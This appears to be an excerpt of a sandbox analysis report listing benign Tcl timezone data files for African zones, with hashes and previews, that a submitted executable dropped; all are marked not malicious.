SHA-512:	C372AD8619EFB9FE1BB7BAE3EE2C1C72F9AAA5669C06248D64AA65E2ED1F4DD50A4F01E7948B4DEA9D44612D177FF89B91572104FB935422BACC23F1DDA18DA3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bissau) {. {-9223372036854775808 -3740 0 LMT}. {-1849388260 -3600 0 WAT}. {157770000 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Blantyre Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.925406132896743
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dc8ycXpkdFkXGm2OHT/dvvXdTk8iv:SlSWB9X52DAmpkdJm2OHZPVk8M
MD5:	D233D13F0094A36A46697B628DA53CD7
SHA1:	B4FE4D0F99796811FE2864EB12408F3A655A8841
SHA-256:	EF775D1308B7DAC4C206E5A6C50F15402FE0FF5AF173FF0ED90E8A451940801A
SHA-512:	E473FF78761D2B9BB4205361B42D531EF59B5AB265DE7003D1DBCE564701DC7A7FE75F949848A22E9DA01A5ACE2F23334778E5ED74AD05EE55D3B5AA160F9E50
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Blantyre) {. {-9223372036854775808 8400 0 LMT}. {-2109291600 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Brazzaville Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	148
Entropy (8bit):	4.974425768793253
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DciE0TMJK/kXGm2OHK1FpsYvUdSaOMYvCn:SlSWB9X52D4q1m2OHm4YVaxLn
MD5:	C070EBAAFCC75AFAE080553599FBB6AA
SHA1:	FD283709C349AA9748107E5B038D4221BDB17757
SHA-256:	B1E556FB71B7EC6F597656F21827A82C384EE9E930B8D6BFE553A032AE5A8A02
SHA-512:	9417F18D89A380F1C459AEB9632AF17B4E67B5E483DBA737C1104002CD2105504B00A609C72D9811A89C042CFE5306A68AAA83B523C7EF91397DF2F039199478
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Brazzaville) {. {-9223372036854775808 3668 0 LMT}. {-1830387668 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Bujumbura Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	146
Entropy (8bit):	4.995456665899767
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DclKXGm2OHqvTsYvXJddJiv:SlSWB9X52DkRm2OHqv4YPJfJM
MD5:	CCDEA01C6C312506BF98A7B5DD4E9AC2
SHA1:	9B32A8436123C408DF34CDB39036934F1CEA5B56
SHA-256:	74E7692176349F3288D241DE8E273A3009D432FF2FEAC12A928C650E8B312E3A
SHA-512:	303F617663FF94D218809ED3785F7FD262180C5F342087E8A2EC9C63F4CC33C09BF960FAB91D852856BCB62515CA4C726A6B82569BD547FD5A27CEFEBF31ACFC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Bujumbura) {. {-9223372036854775808 7048 0 LMT}. {-2524528648 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Cairo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	3604
Entropy (8bit):	3.6940532971208615
Encrypted:	false
SSDEEP:	48:5hRg1oCSY0WF6yU0yWZVYbZ0F0ZeTvc0jDlSBFX84aKqITVuV09ONWHr0L0335Ka:Fu0oVy0FUeLIvQV8c0OvOakCUUA
MD5:	F841DF0249A548F92F3F05CCE8A263D0
SHA1:	2EF1CA679AFE58AD8158420CC02B0642BF5ACF51
SHA-256:	C9AA7C223A32A7E45DBBB6F53E45EA2E5C78FE79FD35A7BC3EB8B2FB69C9B04A
SHA-512:	8613476449CD7915ED81A818C4FB376C9A69D7D03EDF8065A65F341D6C8943447985F9067104456251206E52812BE1F6B7356C93F385E1326E2496A7F993178F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Cairo) {. {-9223372036854775808 7509 0 LMT}. {-2185409109 7200 0 EET}. {-929844000 10800 1 EEST}. {-923108400 7200 0 EET}. {-906170400 10800 1 EEST}. {-892868400 7200 0 EET}. {-875844000 10800 1 EEST}. {-857790000 7200 0 EET}. {-844308000 10800 1 EEST}. {-825822000 7200 0 EET}. {-812685600 10800 1 EEST}. {-794199600 7200 0 EET}. {-779853600 10800 1 EEST}. {-762663600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 72

C:\Users\user\Desktop\tcl\tzdata\Africa\Casablanca Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6018
Entropy (8bit):	3.7383939113861557
Encrypted:	false
SSDEEP:	96:bmu1RZIlkTBcltKPw1qA7I2mjvNII00s94SN4rSi0OlpilxO/6NNl:FPZkltKPw1qGiu+SOS3Oo
MD5:	C82A462924484734E930209D914722CF
SHA1:	58D58AA215285262150A5B13F4A554B205222CDB
SHA-256:	B8914785E48B1D22AEC24410F5B86996ECA5562A8AD9C950717780D125C75BB3
SHA-512:	F421A76D7B2C51429EF23FC8D56ECD6D811CD75228222D6A81C32D39931E9A00F99B3DA7DF6DE8905D073AF8B26454A7FFAD9898BA647F5BAD9F58F11B2F9C13
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Casablanca) {. {-9223372036854775808 -1820 0 LMT}. {-1773012580 0 0 WET}. {-956361600 3600 1 WEST}. {-950490000 0 0 WET}. {-942019200 3600 1 WEST}. {-761187600 0 0 WET}. {-617241600 3600 1 WEST}. {-605149200 0 0 WET}. {-81432000 3600 1 WEST}. {-71110800 0 0 WET}. {141264000 3600 1 WEST}. {147222000 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {448243200 3600 0 CET}. {504918000 0 0 WET}. {1212278400 3600 1 WEST}. {1220223600 0 0 WET}. {1243814400 3600 1 WEST}. {1250809200 0 0 WET}. {1272758400 3600 1 WEST}. {1281222000 0 0 WET}. {1301788800 3600 1 WEST}. {1312066800 0 0 WET}. {1335664800 3600 1 WEST}. {1342749600 0 0 WET}. {1345428000 3600 1 WEST}. {1348970400 0 0 WET}. {1367114400 3600 1 WEST}. {1373162400 0 0 WET}. {1

C:\Users\user\Desktop\tcl\tzdata\Africa\Ceuta Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7253
Entropy (8bit):	3.743963604901828
Encrypted:	false
SSDEEP:	96:/D87tz1URbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyo:/AziRNH4Mn82rlo6XIZ9ALeBO
MD5:	96071CE96EF6D15B4C9A77791843F4AB
SHA1:	0F648B077DF21BF09493547F12701C3DF55DA19E
SHA-256:	DCDE14A3352024BF00D80031A0A7DD3A083E5F149356CF828C6CF72AA2F1CF96
SHA-512:	57B4F3AC0BF57C99C6B2BE3873E41BC838F46167EC2BE136D5CFF29DE00BDD9D979C4317D77A6CDECEF0FECE70094ACDC905BFFF511354878751745469273989
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Ceuta) {. {-9223372036854775808 -1276 0 LMT}. {-2177451524 0 0 WET}. {-1630112400 3600 1 WEST}. {-1616810400 0 0 WET}. {-1451692800 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427677200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1293840000 0 0 WET}. {-81432000 3600 1 WEST}. {-71110800 0 0 WET}. {141264000 3600 1 WEST}. {147222000 0 0 WET}. {199756800 3600 1 WEST}. {207702000 0 0 WET}. {231292800 3600 1 WEST}. {244249200 0 0 WET}. {265507200 3600 1 WEST}. {271033200 0 0 WET}. {448243200 3600 0 CET}. {504918000 3600 0 CET}. {512528400 7200 1 CEST}. {528253200 3600 0 CET}. {543978000 7200 1 CEST}. {559702800 3600 0 CET}. {575427600 7200 1 CEST}. {591152400 3600 0 CET}. {606877200 7200 1 CEST}. {622602000 3600 0 C

C:\Users\user\Desktop\tcl\tzdata\Africa\Conakry Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	197
Entropy (8bit):	4.80755519229325
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcmMMmcXGm2OHA75vUdSawFvDlUT3VQWTvYvFYUQxNvDd:SlSWB9X52DCMCm2OHO5VawFvaVvG5Q7B
MD5:	6040E4F819E799478C36139D83668A09
SHA1:	E80FD02A7CBB09023E9EAB37321A9D9548E88E92
SHA-256:	C42D907DC26998373FE331E2674A5BA2D53F904F79C001699CEDF1444A8C849A
SHA-512:	C754F9F6DB792E900F53A19CE6238D16AA259D3C1EC5977ABB58B6B3E2434640EA8548A1E6544BCC8D9DCB3C5F7D5BC282237B1A328833B4A00034FDFCDF5E4A
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Conakry) {. {-9223372036854775808 -3292 0 LMT}. {-1830380708 0 0 GMT}. {-1131235200 -3600 0 WAT}. {-315615600 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Dakar Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	169
Entropy (8bit):	4.8800358345990205
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcXXMFevFSXGm2OH1hvUdSVZ7RYvFSVqXVF7d:SlSWB9X52DKXEwTm2OH1hVb7RGzvB
MD5:	0E274906F7FD9F56110DF6686850CA6B
SHA1:	3DDEBD813F0D606019DCDBB2E908E9FAE8C16F68
SHA-256:	91B6DB5C73F75CFB02E9988BB25EB178AC8639548D1AE5B67F9974481A5D3C7A
SHA-512:	D8E7E220C7FB7293985173EBB46E2CA0015A88169D5D6FE4FD2244A685A9060A297C5F5C3D124F2FD6CFCB6859217CF4D04565C753336079111FBE9BC49A404D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Dakar) {. {-9223372036854775808 -4184 0 LMT}. {-1830379816 -3600 0 WAT}. {-902098800 0 0 GMT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Dar_es_Salaam Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	210
Entropy (8bit):	4.867479750140784
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dc8bEwcXGm2OHSdgYvUXShkWVNIrTXUekxEYPZ5m0lv:SlSWB9X52DJbfTm2OHugYzVYbUJ3ZUe
MD5:	86C55699186DAD95910783501B9A731B
SHA1:	E741A74578794A5E237826B4D4B1B76736513833
SHA-256:	E5F3F69672A0FD2F6BAC92D18ACCF9DDC674AE8C05B8982A33CFE0C6563ED1BF
SHA-512:	FBA58CC1911EE2C9612CCC7C23DA444BF4BD7B462427707C32F4CACA689BDEBD4CB08B59F5219F005B156980B9DB0342268F51EDE27D8B9B52271DDC26D2D8B0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Dar_es_Salaam) {. {-9223372036854775808 9428 0 LMT}. {-1230777428 10800 0 EAT}. {-694321200 9900 0 BEAUT}. {-284006700 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Djibouti Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	147
Entropy (8bit):	5.0136899912798985
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcRHKQ1eEXGm2OH2dvUdeUcnPvlv:SlSWB9X52DOrULm2OH2d3l
MD5:	3904C75BEB200B26FBAC4A7E7C4CF081
SHA1:	446C8D3DC603AD3B641A3FAE31CAEE9EF3BBA601
SHA-256:	22AB212C615FCA3E511ACC7C8D7A7FD281438EEE32548F09253C99A7B48ED5E5
SHA-512:	D087CD5F09F1C31393BB76F0C425060093EDA8085C1D60BA26C69103DA7AC5A16201211E2D4F6D52D098DAF8925D95FA51B36CF384499BC968F5E63253FB6794
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Djibouti) {. {-9223372036854775808 10356 0 LMT}. {-1846291956 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Douala Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.902751952857552
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcnKtSXGm2OHGXdrsYvUdSa7vYvCn:SlSWB9X52DmCJm2OHGXeYVajLn
MD5:	3D00DBB3182E7F5684CE833476BC8E7E
SHA1:	0C8372B87D7B48F9526FED7300A4B0E1CFD0335C
SHA-256:	7276D8B92DD1B6088B6D8DD6C66EDF5CF156118214454DAF9CBC3C68C7FF2D1B
SHA-512:	7336840B8EF8BD41414620321CF4D94B73B957A5DB75F381BD7D1A7A19CCA0130F2ADF857BA8CAA034E7230639946114A07A7D478D0DFE4430D608F176C91BB3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Douala) {. {-9223372036854775808 2328 0 LMT}. {-1830386328 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\El_Aaiun Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	171
Entropy (8bit):	4.937111990669582
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dcdw/kXGm2OH5YvUUU4VRQ9YvF2dvDxbv:SlSWB9X52DgwTm2OH5YVU47Q9G8vtL
MD5:	474A28310675A24C0F6E897DD07B3459
SHA1:	6EF16FBCCA28A66361C6ACE75F9DAB0DF6C49C7A
SHA-256:	0429CF1C03C8DDA426E0A341A9C0AAFFE2BD274D524B7BDF3EA22CBB090216DE
SHA-512:	92B1D6B8059844B27DFDD60186036EAC788FA82C5B61E37B5539DE892E8369A88C67EBA54DCE227E2DDAFDCE2EFB76AF0B9D4442A6E20983248D0F9BE04A7510
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/El_Aaiun) {. {-9223372036854775808 -3168 0 LMT}. {-1136070432 -3600 0 WAT}. {198291600 0 0 WET}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Freetown Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.1676212160176584
Encrypted:	false
SSDEEP:	12:MBp52DJTmdHYPuIUhOaZva75ap3/3aHW5cvovr+HOTSPs7WPiFWParSPsQQwVZPs:cQdTesuKVLE7WqY/ELwVZEsBSEMX
MD5:	B3969B1C639C6A28D7EA8EB949DE7508
SHA1:	2367AD8F59396FE934E7BB86F8A9502E67554A95
SHA-256:	BBD13BBD5899CEE08C53CA06431454E8FBF2726C8C614B715C32149B402CB866
SHA-512:	590B1EDB8538EF110CDC3F445DBBA2F484A6CB74D383A7141886DC1E417B16841E6A5579815A7CCA04E45C44B632EA245BA322F31F2BFFDF8344850E722C6A0D
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Freetown) {. {-9223372036854775808 -3180 0 LMT}. {-2776979220 -3180 0 FMT}. {-1785712020 -3600 0 WAT}. {-1091487600 -1200 1 SLST}. {-1080949200 -3600 0 WAT}. {-1059865200 -1200 1 SLST}. {-1049326800 -3600 0 WAT}. {-1028329200 -1200 1 SLST}. {-1017790800 -3600 0 WAT}. {-996793200 -1200 1 SLST}. {-986254800 -3600 0 WAT}. {-965257200 -1200 1 SLST}. {-954718800 -3600 0 WAT}. {-933634800 -1200 1 SLST}. {-923096400 -3600 0 WAT}. {-902098800 -1200 1 SLST}. {-891560400 -3600 0 WAT}. {-870562800 -1200 1 SLST}. {-860024400 -3600 0 WAT}. {-410223600 0 0 WAT}. {-397180800 3600 1 SLST}. {-389235600 0 0 GMT}. {-365644800 3600 1 SLST}. {-357699600 0 0 GMT}. {-334108800 3600 1 SLST}. {-326163600 0 0 GMT}. {-302486400 3600 1 SLST}. {-294541200 0 0 GMT}. {-270950400 3600 1 SLST}. {-263005200 0 0 GMT}. {-239414400 3600 1 SLST}. {-231469200 0 0 GMT

C:\Users\user\Desktop\tcl\tzdata\Africa\Gaborone Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	233
Entropy (8bit):	4.697777826609519
Encrypted:	false
SSDEEP:	6:SlSWB9X52DAV3Lm2OHrPGE5mX8b6VcFm5Cd6K8M:MBp52DAV3LmdHrPfmMGVcFUK8M
MD5:	CD0C5545EB89D2F97C68591443AEE19F
SHA1:	D351EDA9AB51702834C2E1DE85DF5EE9986233CD
SHA-256:	777847FDCE7E18EE00FCD3C3674E614174654388E76D5809C3745BACA6B00378
SHA-512:	58C1184EBD2590B3643E84CE919CBA7AA2615F62D687BFC8381546DC347B17C97D79158CEEE515C68C3E7050AA585AF7EF6E0762766C02FDBC0947D35822440C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Gaborone) {. {-9223372036854775808 6220 0 LMT}. {-2682294220 5400 0 SAST}. {-2109288600 7200 0 CAT}. {-829526400 10800 1 CAST}. {-813805200 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Harare Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.914593410440557
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dc0edFkXGm2OH7dp5vXdKQVSX8iv:SlSWB9X52DledJm2OH35P1Vk8M
MD5:	02FDC96DD509FDC081569C9B478A0C8D
SHA1:	9C29B9CD7947325AADE7F896EE5211FEF1E58E21
SHA-256:	6F55B99772CF5A407BCA0063230EEE6EC3CAA6CF0930770CB65F3D02024E8146
SHA-512:	6F18EE82284E49A836412408B8482F081E1BE05370CB6B4F7F4A4AE23BC382D014B35902482811981793E86D4E3B43A632441C18CB69EF83536C235491FE1847
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Harare) {. {-9223372036854775808 7452 0 LMT}. {-2109290652 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Johannesburg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	298
Entropy (8bit):	4.638948195674004
Encrypted:	false
SSDEEP:	6:SlSWB9X52DWbAm2OHePP1mXs0//HF20706VcF206KsF:MBp52DWkmdHePP1mcUvFxJVcFEKsF
MD5:	256740512DCB35B4743D05CC24C636DB
SHA1:	1FD418712B3D7191549BC0808CF180A682AF7FC1
SHA-256:	768E9B2D9BE96295C35120414522FA6DD3EDA4500FE86B6D398AD452CAF6FA4B
SHA-512:	DCFF6C02D1328297BE24E0A640F5823BFD23BDE67047671AC18EB0B1F450C717E273B27A48857F54A18D6877AB8132AAED94B2D87D2F962DA43FE473FC3DDC94
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Johannesburg) {. {-9223372036854775808 6720 0 LMT}. {-2458173120 5400 0 SAST}. {-2109288600 7200 0 SAST}. {-860976000 10800 1 SAST}. {-845254800 7200 0 SAST}. {-829526400 10800 1 SAST}. {-813805200 7200 0 SAST}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Juba Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	3.9553244896369524
Encrypted:	false
SSDEEP:	24:cQreTn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8Wb2:5An010ilux1XeKXhCvN9U0TMGqCp8jYH
MD5:	CD4491EA48B4560577EFA89D7DEE891E
SHA1:	2E8333ED309B1A3FC3B082693BB351DFE44BA9DD
SHA-256:	DB7E486E87A9089B2CB9C20207A869A8BFBC35D125B797C5FAD4211BA800753E
SHA-512:	BA21C161CFFC47958516BAACD1CED76DAD2074E23E2DCF57C3B01E844302E0E77852772FF21432127CF2CD781C1F94540E6F3EFEE14D3C853E30691F5F0286D8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Juba) {. {-9223372036854775808 7584 0 LMT}. {-1230775584 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1 CAST

C:\Users\user\Desktop\tcl\tzdata\Africa\Kampala Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	234
Entropy (8bit):	4.753964461375144
Encrypted:	false
SSDEEP:	6:SlSWB9X52DIECJm2OHLfX26Vk/7VV7nRn4:MBp52D5CJmdHLfXvkVNR4
MD5:	F7404FBEB89AFAF18CF1D9DE365707EB
SHA1:	30B9298557C2BF1B4315A106C88FEE4A7289512C
SHA-256:	43C01C74107DE0C94436C663DCFF9A7F983013168B3746CFF765DD03FAA54E2A
SHA-512:	A9D0CF91770461FD959D4B527CA8956860B98175B8D9BCB3A0CDDADAFACFBC6251019830161728CFAB22FA7C1C2F1D6AF0B1B7074791AAAE130FC910D7482BA1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Kampala) {. {-9223372036854775808 7780 0 LMT}. {-1309745380 10800 0 EAT}. {-1262314800 9000 0 BEAT}. {-694319400 9900 0 BEAUT}. {-410237100 10800 0 EAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Khartoum Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	3.967955792980027
Encrypted:	false
SSDEEP:	24:cQWe9hXn0Vb0iluy8pLXeKXhCvN9U0TlW50qCPR8jYJRFp0Q8SdAri/8+u8Wb2:5vn010ilux1XeKXhCvN9U0TMGqCp8jYH
MD5:	58D2DAB313AF844E330560A3ECFCB150
SHA1:	2ACBE3F6BFE4A0435BF7B1BE1D1AFEC74F1B61BB
SHA-256:	4AE7C0262505994EFD358165D8A3D896ED3D7766EB2F2EC0029E54CC27663A11
SHA-512:	35CF9D2D1B13C21BD672A1960F2A77A3FD7F52DA208990D4D10891A4FD87CE90E946A5FF1383FB11F0B3675C335B1EAD5B4F1913AB1302ED550CE94D1B21E7A2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Khartoum) {. {-9223372036854775808 7808 0 LMT}. {-1230775808 7200 0 CAT}. {10360800 10800 1 CAST}. {24786000 7200 0 CAT}. {41810400 10800 1 CAST}. {56322000 7200 0 CAT}. {73432800 10800 1 CAST}. {87944400 7200 0 CAT}. {104882400 10800 1 CAST}. {119480400 7200 0 CAT}. {136332000 10800 1 CAST}. {151016400 7200 0 CAT}. {167781600 10800 1 CAST}. {182552400 7200 0 CAT}. {199231200 10800 1 CAST}. {214174800 7200 0 CAT}. {230680800 10800 1 CAST}. {245710800 7200 0 CAT}. {262735200 10800 1 CAST}. {277246800 7200 0 CAT}. {294184800 10800 1 CAST}. {308782800 7200 0 CAT}. {325634400 10800 1 CAST}. {340405200 7200 0 CAT}. {357084000 10800 1 CAST}. {371941200 7200 0 CAT}. {388533600 10800 1 CAST}. {403477200 7200 0 CAT}. {419983200 10800 1 CAST}. {435013200 7200 0 CAT}. {452037600 10800 1 CAST}. {466635600 7200 0 CAT}. {483487200 10800 1

C:\Users\user\Desktop\tcl\tzdata\Africa\Kigali Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	143
Entropy (8bit):	4.986262292087319
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcCJOvcXGm2OHjvUVAgSd+iv:SlSWB9X52DROLm2OHjeXM
MD5:	0BC91A5C7C5F86E9DDA0726F4E5C36D3
SHA1:	F83A893EE72FC3762472AA8232832994FF14C0BB
SHA-256:	8AB0E0C036C990B7443AB765D0B5DD3C3954875375F8496CA9D45EAEE9938B67
SHA-512:	D4E972D93E9D386C4F84B63FBE26FB12DF42A93D83802DDB07C23D2022581B73635C00906C190CCD1D0A6963CC2D27A77D6860BAC6EB4F0B42D8F596DB581EEF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Kigali) {. {-9223372036854775808 7216 0 LMT}. {-1091498416 7200 0 CAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Kinshasa Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	145
Entropy (8bit):	4.93997005907022
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcqQFtXGm2OHLVVFvvXGlXGZYvCn:SlSWB9X52DDm2OHLNPGl+Ln
MD5:	CFF821349F0FB13E7FD784FDA03D85D6
SHA1:	AF93BBA65222C6766419E75E30E7828576DEFD87
SHA-256:	2B853B554520035B9370A476F3F52E77915BDE97FDB72974E647315F6F70E061
SHA-512:	052550F3D74ED5CEFF7153CFFCA34B3A2EC6D6FD85A07D7B37F02EF611F31A7C02866E84D15CB77600F4DB79974741D7E27E7AD475C4A2F281F3B697253FECC4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Kinshasa) {. {-9223372036854775808 3672 0 LMT}. {-2276643672 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Lagos Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	141
Entropy (8bit):	4.965079502032549
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52DcGemFFkXGm2OHWTdvUQDWTFWZRYvCn:SlSWB9X52D4mFJm2OHWTdRDWTGRLn
MD5:	51D7AC832AE95CFDE6098FFA6FA2B1C7
SHA1:	9DA61FDA03B4EFDA7ACC3F83E8AB9495706CCEF1
SHA-256:	EEDA5B96968552C12B916B39217005BF773A99CA17996893BC87BCC09966B954
SHA-512:	128C8D3A0AA7CF4DFAE326253F236058115028474BF122F14AB9461D910A03252FEEB420014CA91ACFBF94DF05FBFCADE98217FC59A86A2581BB68CDC83E88C8
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Lagos) {. {-9223372036854775808 816 0 LMT}. {-1588464816 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Libreville Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	147
Entropy (8bit):	4.9419343354523955
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52Dcr70/kXGm2OHHjVFmYvUdSatOYvCn:SlSWB9X52Dgsm2OHKYVatOLn
MD5:	006A98F7A00ECA15355ED194E47106FE
SHA1:	FE26D677D3D4CBCBCD1C927396E5146DEF44CE06
SHA-256:	ABB28F5821C7BD991AAE3E5F70E967B227AF70E07446FB870A24605458773402
SHA-512:	A966D09371427642C4B0DD3CCCF4F2B5708E65684E39E711478D2708C23775280DD8A41E0A64B09C3012688073B6C0B5915CD53470939386819272D25DFC990E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Libreville) {. {-9223372036854775808 2268 0 LMT}. {-1830386268 3600 0 WAT}.}.

C:\Users\user\Desktop\tcl\tzdata\Africa\Lome Download File
